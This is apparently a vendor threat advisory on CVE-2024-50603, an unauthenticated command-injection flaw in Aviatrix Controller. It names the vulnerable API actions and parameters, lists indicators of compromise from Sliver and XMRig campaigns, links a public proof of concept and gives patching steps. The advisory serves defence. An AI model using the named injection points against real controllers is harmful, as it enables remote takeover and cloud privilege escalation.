Alert essentials:
Successful attacks allow an unauthenticated user to execute arbitrary commands remotely on the controller.
Update controllers immediately and restrict public access to Aviatrix.
Detailed threat description:
Aviatrix enables enterprise organizations to deliver purpose-built infrastructure to support business-critical applications and accelerate cloud initiatives.
Due to the improper neutralization of special elements used in an OS command, an unauthenticated, remote attacker may execute arbitrary code into Aviatrix controllers.
Requiring no user interaction, the weakness with a cvss rating of 10 grants unauthorized control of the system and user inputs sent to specific endpoints.
The root cause of the vulnerability lies in how user inputs are processed within the Aviatrix Controller’s API. While some parameters are properly sanitized using functions like escapeshellarg, others are not.
Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test to allow execution of arbitrary code.
A virtual machine hosting Aviatrix Controller has a lateral movement path to administrative cloud control plane permissions. To perform IAM actions and function properly, the Aviatrix Controller is granted high IAM privileges in AWS cloud environments by default.
This potential for lateral movement makes Aviatrix Controller a prime target for threat actors aiming to move laterally and escalate their privileges in the cloud environment.
At least one proof-of-concept exploit has been published, and exploitation for deploying the Sliver backdoor has been observed in the wild.
However, no reports of lateral movement have surfaced as of this writing. Considering active exploitation, users are recommended to apply the patches as soon as possible to prevent public access to the Aviatrix Controller.
Additionally, restricting public access to the controller can significantly reduce the attack surface.
Impacts on healthcare organizations:
Access to sensitive cloud networking configurations and data allows attackers to exfiltrate confidential information, compromising organizational data integrity and privacy.
This weakness allows malicious code to disrupt networking operations, leading to service downtime and affecting the organization’s ability to provide uninterrupted services.
Affected Products / Versions:
Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996
CVEs
CVE-2024-50603 – CWE 78 – (CVSS 10)
IOC | Description |
---|---|
91.193.19[.]109:13333 | Sliver C2 Server IP address |
107.172.43[.]186:3939 | Cryptocurrency mining pool IP address |
1ce0c293f2042b677cd55a393913ec052eded4b9 | XMRig (SHA1) |
68d88d1918676c87dcd39c7581c3910a9eb94882 | XMRig (SHA1) |
c4f63a3a6cb6b8aae133bd4c5ac6f2fc9020c349 | XMRig (SHA1) |
c63f646edfddb4232afa5618e3fac4eee1b4b115 | XMRig (SHA1) |
e10e750115bf2ae29a8ce8f9fa14e09e66534a15 | Sliver (SHA1) |
41d589a077038048c4b120494719c905e71485ba | Sliver (SHA1) |
/tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/.system_logs/momika233-2024-04-29-xmrig.zip | XMRig (Path) |
/tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/moneroocean/xmrig | XMRig (Path) |
/tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/.uid/udiskssd | XMRig (Path) |
/tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/config | Sliver (Path) |
Recommendations
Engineering recommendations:
- Backup the Aviatrix controller
- The Aviatrix Controller backup and restore can be performed directly from the Controller UI
- Install Critical Vulnerability Security Patch for CVE-2024-50603 or update the Controller to 7.1.4191 or 7.2.4996
- Validate the update with the Patch Status
- In certain circumstances, the patch is not fully persistent across controller upgrades and must be re-applied even if the controller status is displayed as “Patched”
- These circumstances are:
- The patch was first applied to a version prior to 7.1.4191 or 7.2.4996
- The Controller is subsequently updated to a version prior to 7.1.4191 or 7.2.4996
- The Controller does not have an associated CoPilot running version 4.16.1 or higher
- These circumstances are:
- Backup the Aviatrix Controller again with the new configuration
- Since the Controller stores configuration data, it should be periodically backed up to the appropriate AWS/Azure/Google account
- Conduct forensic investigations on devices
- Search for lateral movement attempts in the cloud plane
Leadership/ Program recommendations:
- When the Controller is down or out of service, the network will continue to be operational, and encrypted tunnels and OpenVPN® users will stay connected and unaffected
- Since most of the data logs are forwarded from the gateways directly, the loss of log information from the Controller is minimal during downtime
- Customers are strongly recommended to perform image migration 2x a year
- Aviatrix publishes Field Notices and sends alerts to the Controller Admin in the Controller console when security-related issues are published
Fortified recommends applying patches and updates where possible and only after adequate testing in a development environment to ensure stability and compliance with organizational change management policies.
References:
- Aviatrix advisory: https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
- Aviatrix Backup and Restore: https://docs.aviatrix.com/documentation/latest/platform-administration/controller/controller-backup-restore.html
- Aviatrix permissions: https://docs.aviatrix.com/documentation/latest/platform-administration/accounts-and-users/iam-role.html#what-permissions-are-required-in-app-role-policy-and-why
- Aviatrix security patches: https://docs.aviatrix.com/documentation/latest/release-notices/security-patches/security-patches.html
- Proof-of-Concept: https://github.com/th3gokul/CVE-2024-50603
- Sliver backdoor: https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver